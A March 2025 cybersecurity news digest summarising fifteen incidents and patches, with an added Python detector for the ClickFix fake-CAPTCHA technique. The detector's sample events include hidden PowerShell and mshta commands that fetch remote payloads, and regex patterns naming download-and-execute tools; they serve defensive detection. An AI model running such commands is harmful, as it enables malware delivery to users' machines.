March Cybersecurity News Digest

Highlights from the cybersecurity world  

1. 331 malicious apps on Google Play evade Android 13 security

A recent report found 331 malicious apps on the Google Play Store, which have been downloaded over 60 million times and exploit vulnerabilities in Android 13. These apps, posing as QR scanners, expense trackers, health apps, and wallpaper tools, deceive users into installing them.

Attackers can carry out activities without user interaction, hide app icons, display full-screen ads, and collect sensitive information like credentials and credit card details. This incident highlights significant security vulnerabilities in Android and underscores the need for better third-party security solutions.

2. 23,000 GitHub repositories targeted in one of the largest supply chain attacks

A significant security breach recently affected around 23,000 GitHub repositories in one of the largest supply chain attacks. Attackers exploited vulnerabilities in the software development pipeline through phishing and token exploitation to compromise maintainer accounts and inject malicious code.

GitHub confirmed unauthorised commits in popular open-source projects and has temporarily restricted access to affected repositories. Users should audit recent commits and update their dependencies to verified versions, while organisations are encouraged to enhance their software supply chain security.

3. Watch out for free Word to PDF converters. They may deliver malware!

Cybercriminals target users searching for free document conversion tools, particularly Word-to-PDF converters. These malicious converters often appear legitimate and rank high in search results. Many victims are unaware that their systems are compromised until they suffer identity theft or a ransomware infection.

Once run, these tools secretly install malware that can create backdoors for long-term access, leading to the theft of email credentials, financial details and passwords. To stay safe, users should rely on trusted software from verified publishers.

4. Three critical vulnerabilities found in Adobe Acrobat Reader

Three significant vulnerabilities in multiple versions of Adobe Acrobat Reader could allow attackers to execute arbitrary code or access sensitive information when a malicious PDF is opened. The first is a high-severity memory corruption flaw, the second is an out-of-bounds read that may expose passwords or cryptographic keys, and the third is a medium-severity out-of-bounds read that can disclose sensitive information.

Users and organisations are urged to update to the latest versions of Adobe Acrobat and Reader, with patches released on March 11, 2025.

5. Beware of password-stealing software mimicking Booking.com

A phishing campaign impersonating Booking.com has targeted hospitality organisations since December 2024. Attackers send fake emails with negative reviews or account verification requests, featuring malicious links or PDF attachments linked to fraudulent sites that mimic Booking.com.

The campaign uses a “ClickFix” technique: victims who follow the links land on a fake CAPTCHA page that prompts them to execute a command in the Windows Run dialog, which downloads malware that can steal passwords, capture financial information, and allow remote access for further attacks.

6. Microsoft 365-themed attack uses OAuth redirection to take over accounts

Sophisticated phishing campaigns targeting Microsoft 365 users exploit OAuth redirection vulnerabilities and brand impersonation, focusing on high-value employees like executives and finance staff. Malicious OAuth apps impersonating “Adobe Drive,” “Adobe Acrobat,” and “DocuSign” direct victims to malware sites, granting access to emails and sensitive data.

Organisations should adopt phishing-resistant methods like FIDO2 security keys, disable legacy authentication, and use number matching for multi-factor authentication. Regular reviews of Azure AD logs, alerts for risky sign-ins, monitoring of OAuth consent requests, and security training are also recommended.

7. Mozilla urges users to update Firefox as a critical certificate expires

Mozilla issued an urgent warning for Firefox users to update their browsers before March 14, 2025, when a critical root certificate expires. Users running versions earlier than 128, or ESR versions earlier than 115.13, are affected. The expiration could disable extensions, break DRM playback, and expose users to security risks such as compromised passwords and exposure to fraudulent websites.

8. Fake CAPTCHA malware attacks Windows users to run PowerShell commands

A recent malware campaign, identified in February 2025, targets Windows users with fake CAPTCHA prompts that mislead victims into running malicious PowerShell scripts. These deceptive attacks bypass security measures by prompting users to execute a PowerShell command disguised as a verification step. This initiates a multi-stage infection process involving an HTA file disguised as an MP4. Security experts recommend boosting security awareness training and implementing advanced endpoint protection.
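Items 5 and 8 describe the same ClickFix pattern: a user pastes a command into the Windows Run dialog, which launches a script host that fetches a payload (here an HTA disguised as an MP4). The following added example, not code from the original post, shows detection logic for that chain run over constructed process-creation events; the event fields, paths and URLs are all constructed for illustration.

```python
import re

# Constructed process-creation events (Sysmon Event ID 1 style fields), not real telemetry.
# The Run dialog is hosted by explorer.exe, so a script host spawned by explorer.exe that
# reaches out to the network is the shape of the ClickFix chain described above.
SAMPLE_EVENTS = [
    {"parent": r"C:\Windows\explorer.exe", "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": "mshta.exe https://cdn.example.invalid/verify/clip.mp4"},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": 'powershell -w hidden -c "iwr https://cdn.example.invalid/verify"'},
    {"parent": r"C:\Windows\explorer.exe", "image": r"C:\Windows\System32\notepad.exe",
     "cmdline": r"notepad.exe C:\Users\me\notes.txt"},
    {"parent": r"C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell -File C:\scripts\signature.ps1"},
    {"parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell Get-ChildItem"},
]

SCRIPT_HOSTS = {"mshta.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe"}
# Indicators that the command fetches remote content to execute rather than working locally.
REMOTE_FETCH = re.compile(r"https?://|\biwr\b|invoke-webrequest|downloadstring|\biex\b|invoke-expression", re.I)
# mshta normally takes an .hta file; a media or document extension is the "HTA hidden as MP4" trick.
MSHTA_DISGUISE = re.compile(r"\.(mp4|jpg|png|pdf|txt)\b", re.I)

def basename(path):
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def clickfix_findings(events):
    """Return (event index, reason) for events matching explorer.exe -> script host -> remote fetch."""
    findings = []
    for i, ev in enumerate(events):
        child = basename(ev["image"])
        if basename(ev["parent"]) != "explorer.exe" or child not in SCRIPT_HOSTS:
            continue  # not launched from the Run dialog / desktop shell, or not a script host
        cmd = ev["cmdline"]
        if child == "mshta.exe" and MSHTA_DISGUISE.search(cmd):
            findings.append((i, "mshta launched from explorer with a non-.hta argument"))
        elif REMOTE_FETCH.search(cmd):
            findings.append((i, f"{child} launched from explorer with a remote fetch/execute"))
    return findings

if __name__ == "__main__":
    for idx, why in clickfix_findings(SAMPLE_EVENTS):
        print(f"ALERT event {idx}: {why} :: {SAMPLE_EVENTS[idx]['cmdline']}")
```

The parent-process check is what separates the Run-dialog abuse from legitimate PowerShell launched by Outlook or cmd.exe, which are deliberately left in the sample as benign controls.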

9. Microsoft March 2025 Patch Tuesday

Microsoft’s March 2025 Patch Tuesday fixes 57 vulnerabilities, including six zero-day vulnerabilities that are currently being exploited. The security update covers Windows, Microsoft Office, and Azure, among others. Users are urged to update their software immediately, especially given the number of actively exploited vulnerabilities.

10. Several Zoom client vulnerabilities reveal sensitive information

Critical vulnerabilities in Zoom’s client software, with CVSS scores of 7.1 to 8.5, expose users to data breaches and unauthorised access. Users should upgrade to Zoom Client 6.2.0 or later to patch 12 vulnerabilities. It is also recommended to restrict access for unauthenticated users and to audit logs for unusual activity. In high-risk environments, consider third-party tools for end-to-end encryption, as Zoom does not offer this feature natively.

11. Google alerted Chromecast owners not to perform a factory reset

Google has issued an urgent advisory for Chromecast 2nd Generation (2015) and Chromecast Audio users, warning against factory resets due to a global outage caused by an expired security certificate. This issue affects over 20 million units, leading to failed setups and devices showing as “Offline” in the Home app. The outage is linked to the expiration of the Chromecast ICA 3 intermediate certificate authority on March 9, 2025.

Google is working on a fix but has not provided a timeline for resolution. This incident highlights the need for better long-term certificate management in IoT devices.

12. Eleven11bot launches record-breaking DDoS attacks using 30,000 hacked webcams

We’ve already informed you about the newly surfaced botnet named "Eleven11bot", which has triggered what is believed to be the most extensive DDoS attacks on record. Read our dedicated post to learn more.

13. Chrome Security Update addresses multiple high-severity vulnerabilities

Google has released a critical Chrome security update (version 134.0.6998.88/.89 for Windows and Mac and 134.0.6998.88 for Linux), fixing five high-severity vulnerabilities related to arbitrary code execution and sandbox escapes. Chrome updates automatically, but users must restart the browser manually to activate the latest patches. With increasing browser-based attacks, maintaining good patch discipline is essential.

14. LibreOffice vulnerability allows attackers to execute arbitrary scripts

A critical security vulnerability in LibreOffice exposed millions of users to remote code execution attacks via manipulated macro URLs. Patched in versions 24.8.5 and 25.2.1 in March, this flaw allowed attackers to bypass security protocols and execute scripts through LibreOffice’s custom URI scheme. Targeting enterprises using LibreOffice with SharePoint, the exploit embedded malicious payloads in document-sharing links. The issue highlights the ongoing challenges of securing open-source office suites against social engineering attacks.

15. Google alerts users to two serious Android vulnerabilities

Google has issued an urgent security warning regarding two critical Android vulnerabilities that are actively exploited in coordinated attacks against devices running Android versions 12 through 15. These issues, which were patched in the March 2025 Android Security Bulletin, allow attackers to bypass lock screens, escalate privileges, and execute remote code. Users are urged to install updates immediately.

Stay tuned and keep your system safe! If you need help, contact us for expert advice! 
